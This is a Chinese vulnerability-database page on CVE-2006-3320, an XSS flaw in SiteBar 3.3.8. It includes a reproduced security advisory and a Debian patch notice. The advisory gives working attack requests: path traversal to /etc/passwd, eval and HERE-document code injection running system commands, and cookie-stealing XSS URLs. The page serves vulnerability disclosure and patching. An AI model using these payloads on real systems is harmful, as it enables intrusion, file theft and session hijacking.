CVE-2006-3320
CVSS2.6
发布时间 :2006-06-29 21:05:00
修订时间 :2011-03-07 21:38:21
NMCOPS    

[原文]Cross-site scripting (XSS) vulnerability in command.php in SiteBar 3.3.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the command parameter.


[CNNVD]SiteBar Command.PHP 跨站脚本攻击漏洞(CNNVD-200606-603)

        SiteBar 3.3.8及更早版本的command.php中的跨站脚本攻击(XSS)漏洞。远程攻击者通过command参数注入任意Web脚本或HTML。

- CVSS (基础分值)

CVSS分值: 2.6 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:sitebar:sitebar:3.3.7
cpe:/a:sitebar:sitebar:3.3.3
cpe:/a:sitebar:sitebar:3.3.5
cpe:/a:sitebar:sitebar:3.3.4
cpe:/a:sitebar:sitebar:3.3.8
cpe:/a:sitebar:sitebar:3.3.6
cpe:/a:sitebar:sitebar:3.3.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3320
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3320
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-603
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/27421
(UNKNOWN)  XF  sitebar-command-xss(27421)
http://www.vupen.com/english/advisories/2006/2568
(UNKNOWN)  VUPEN  ADV-2006-2568
http://www.securityfocus.com/bid/18680
(UNKNOWN)  BID  18680
http://www.securityfocus.com/archive/1/archive/1/438464/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060627 [Kurdish Security # 11] SiteBar Cross-Site Scripting
http://secunia.com/advisories/20841
(VENDOR_ADVISORY)  SECUNIA  20841
http://kurdishsecurity.blogspot.com/2006/06/kurdish-security-11-sitebar-cross-site.html
(UNKNOWN)  MISC  http://kurdishsecurity.blogspot.com/2006/06/kurdish-security-11-sitebar-cross-site.html
http://www.securityfocus.com/bid/26126
(UNKNOWN)  BID  26126
http://www.securityfocus.com/archive/1/archive/1/482499/100/0/threaded
(UNKNOWN)  BUGTRAQ  20071018 Serious holes affecting SiteBar 3.3.8
http://www.osvdb.org/26869
(UNKNOWN)  OSVDB  26869
http://www.debian.org/security/2006/dsa-1130
(UNKNOWN)  DEBIAN  DSA-1130
http://teamforge.net/viewcvs/viewcvs.cgi/tags/release-3.3.9/doc/history.txt?view=markup
(UNKNOWN)  CONFIRM  http://teamforge.net/viewcvs/viewcvs.cgi/tags/release-3.3.9/doc/history.txt?view=markup
http://securityreason.com/securityalert/1174
(UNKNOWN)  SREASON  1174
http://secunia.com/advisories/21248
(UNKNOWN)  SECUNIA  21248

- 漏洞信息

SiteBar Command.PHP 跨站脚本攻击漏洞
低危 跨站脚本
2006-06-29 00:00:00 2006-07-03 00:00:00
远程  
        SiteBar 3.3.8及更早版本的command.php中的跨站脚本攻击(XSS)漏洞。远程攻击者通过command参数注入任意Web脚本或HTML。

- 公告与补丁

        暂无数据

- 漏洞信息 (F60265)

NDSA20071016.txt (PacketStormID:F60265)
2007-10-22 00:00:00
Tim Brown  nth-dimension.org.uk
exploit,remote,web,arbitrary,javascript
CVE-2006-3320,CVE-2007-5492,CVE-2007-5491
[点击下载]

Nth Dimension Security Advisory (NDSA20071016) - The SiteBar application has single high risk issues with its translation module. It can can be made to retrieve any file to which the web server user has read access. The SiteBar application has multiple high risk issues with its translation module. It can be made to execute arbitrary code to gain remote access as the web server user typically nobody. The SiteBar application has multiple medium risk issues where it is vulnerable to Javascript injection within the requested URL. The SiteBar application has single medium risk issue where it is vulnerable to malicious redirects within the requested URL. Version 3.3.8 is affected.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Nth Dimension Security Advisory (NDSA20071016)
Date: 16th October 2007
Author: Tim Brown <mailto:timb@nth-dimension.org.uk>
URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
Product: SiteBar 3.3.8 <http://www.sitebar.org/>
Vendor: Ondřej Brablc, David Szego and SiteBar Team <http://www.sitebar.org/>
Risk: High

Summary

This advisory comes in 4 related parts:

1) SiteBar application has single high risk issues with its translation
module.  It can can be made to retrieve any file to which the web server user
has read access.

2) SiteBar application has multiple high risk issues with its translation
module.  It can be made to execute arbitrary code to gain remote access
as the web server user typically nobody.

3) SiteBar application has multiple medium risk issues where it is vulnerable
to Javascript injection within the requested URL.

4) SiteBar application has single medium risk issue where it is vulnerable to
malicious redirects within the requested URL.

Technical Details

1) The SiteBar application translation module can be made to read any
arbitrary file that the web server user has read access to, as it makes
no sanity checks on the value passed within the dir parameter of the URL,
for example:

http://192.168.1.1/translator.php?dir=/etc/passwd%00

Note the use of %00 to terminate the malicious and so prevent the intended
string concatenation occuring.

2) The SiteBar application translation module can be forced into code
execution can occur in one of two ways.  Firstly, it makes no sanity checks
on the value passed within the edit parameter prior to using the value as
part of an eval() call, for example:

http://192.168.1.1/translator.php?lang=zh_CN&cmd=upd&edit=$GET[%22lang%22];system(%22uname%20-a%22);

Secondly, whilst modifying strings within a translation, it makes no sanity
checks on the value passed for a given string to be embedded within a HERE
document within the languages strings library.  It is therefore possible to
terminate the HERE document and pass arbitrary code which will be executed
whenever the languages strings library is included, for example:

POST http://192.168.1.1/translator.php?lang=test&edit=text HTTP/1.1
Host: 192.168.1.1
Referer: http://192.168.1.1/translator.php?lang=test&edit=text
Cookie: SB3COOKIE=1; SB3AUTH=3efab8d1dc9a149d7d1d7866a33d2539
Content-Type: application/x-www-form-urlencoded
Content-length: 47497

dir=&label%5B0%5D=The+Bookmark+Server+for+Personal+and+Team+Use&md5%5B0%5D=823084516ae27478ec4c5fd40fb32ea8&value%5B0%5D=_P;

system('id');

?>

Note that _P terminates the HERE document.

3) The values of the URL requested are used in within the web pages returned
by the various scripts, in their unsanitised form.  Specifically, it makes
no sanity checks on the value passed within the multiple parameters of the
URL, for example:

http://192.168.1.1/integrator.php?lang="><script>alert('xss')</script> - Allows '
http://192.168.1.1/command.php?command=New+Password&uid=&token="><script>alert(document.cookie)</script> - Does not allow '
http://192.168.1.1/command.php?command=Folder%20Properties&nid_acl=%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow '
http://192.168.1.1/index.php?target=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow '
http://192.168.1.1/command.php?command='%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow ', this one turned out to be CVE-2006-3320.
http://192.168.1.1/command.php?command=Modify%20User&uid=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E - Allows '

Note that CVE-2006-3320 had not been resolved at the time of testing, in
September 2007, and so we included it in our vulnerability report to the vendor
for completeness.

4) Finally, the SiteBar can be made to redirect users to malicious locations,
as it makes no checks on the value passed within the forward parameter of the URL,
for example:

http://192.168.1.1/command.php?command=Log%20In&forward=http://www.google.com/

Solutions

Following vendor notification on the 27th September 2007, the vendor promptly
responded with an initial patch on the 7th October which has been attached along
with this advisory and which resolved the reported issues.  Nth Dimension would
recommend applying this patch as soon as possible.  Alternatively, from 3.3.9
(available at http://sitebar.org/downloads.php) onwards also include this patch.
Nth Dimension would like to thank Ondraj from the SiteBar team for the way he
worked to resolve the issue.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHFo3OVAlO5exu9x8RAhLWAJ0Vw4cessVBHnFMswYp6aDlmriDnwCfXpil
wyDF4P/iRQ5Ab7FqJFutWBA=
=Oqb/
-----END PGP SIGNATURE-----
    

- 漏洞信息 (F48986)

Debian Linux Security Advisory 1130-1 (PacketStormID:F48986)
2006-08-17 00:00:00
Debian  debian.org
advisory,remote,web,arbitrary,php,xss
linux,debian
CVE-2006-3320
[点击下载]

Debian Security Advisory 1130-1 - A cross-site scripting vulnerability has been discovered in sitebar, a web based bookmark manager written in PHP, which allows remote attackers to inject arbitrary web script or HTML.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1130-1                    security@debian.org
http://www.debian.org/security/                             Martin Schulze
July 30th, 2006                         http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : sitebar
Vulnerability  : missing input validation
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2006-3320
BugTraq ID     : 18680
Debian Bug     : 377299

A a cross-site scripting vulnerability has been discovered in sitebar,
a web based bookmark manager written in PHP, which allows remote
attackers to inject arbitrary web script or HTML.

For the stable distribution (sarge) this problem has been fixed in
version 3.2.6-7.1.

For the unstable distribution (sid) this problem has been fixed in
version 3.3.8-1.1.

We recommend that you upgrade your sitebar package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given at the end of this advisory:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.2.6-7.1.dsc
      Size/MD5 checksum:      567 af6299567258255742c9289ead8618e4
    http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.2.6-7.1.diff.gz
      Size/MD5 checksum:     9214 2309667ac14ea821c7a1ba14b8a59916
    http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.2.6.orig.tar.gz
      Size/MD5 checksum:   333352 a86243f7a70a1a9ac80342fbcca14297

  Architecture independent components:

    http://security.debian.org/pool/updates/main/s/sitebar/sitebar_3.2.6-7.1_all.deb
      Size/MD5 checksum:   339760 98d388ce2b2c8d746d333f6286e22c0b


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEz2z0W5ql+IAeqTIRAnRrAJ9IALHV10MpVab3Fflkmfx82mfCngCeLHCd
oXpZb7Bj2WJkHIec2iIadfs=
=2c7k
-----END PGP SIGNATURE-----

    

- 漏洞信息

26869
SiteBar command.php command Parameter XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

SiteBar contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'command' variable upon submission to the command.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- 时间线

2006-06-27 Unknow
2006-06-27 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

SiteBar Command.PHP Cross-Site Scripting Vulnerability
Input Validation Error 18680
Yes No
2006-06-27 12:00:00 2007-10-24 03:37:00
Kurdish security is credited with the discovery of this vulnerability.

- 受影响的程序版本

SiteBar SiteBar 3.3.8
SiteBar SiteBar 3.3.7
SiteBar SiteBar 3.3.6
SiteBar SiteBar 3.3.5
SiteBar SiteBar 3.3.4
SiteBar SiteBar 3.3.3
SiteBar SiteBar 3.3.2
SiteBar SiteBar 3.2.6
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
SiteBar SiteBar 3.3.9

- 不受影响的程序版本

SiteBar SiteBar 3.3.9

- 漏洞讨论

SiteBar is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

- 漏洞利用

Attackers can exploit this issue by enticing a victim user into following a malicious URI.

An example URI has been provided.

- 解决方案

The vendor released SiteBar 3.3.9 to address this issue. Please see the references for more information.


SiteBar SiteBar 3.2.6

SiteBar SiteBar 3.3.2

SiteBar SiteBar 3.3.3

SiteBar SiteBar 3.3.4

SiteBar SiteBar 3.3.5

SiteBar SiteBar 3.3.6

SiteBar SiteBar 3.3.7

SiteBar SiteBar 3.3.8

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站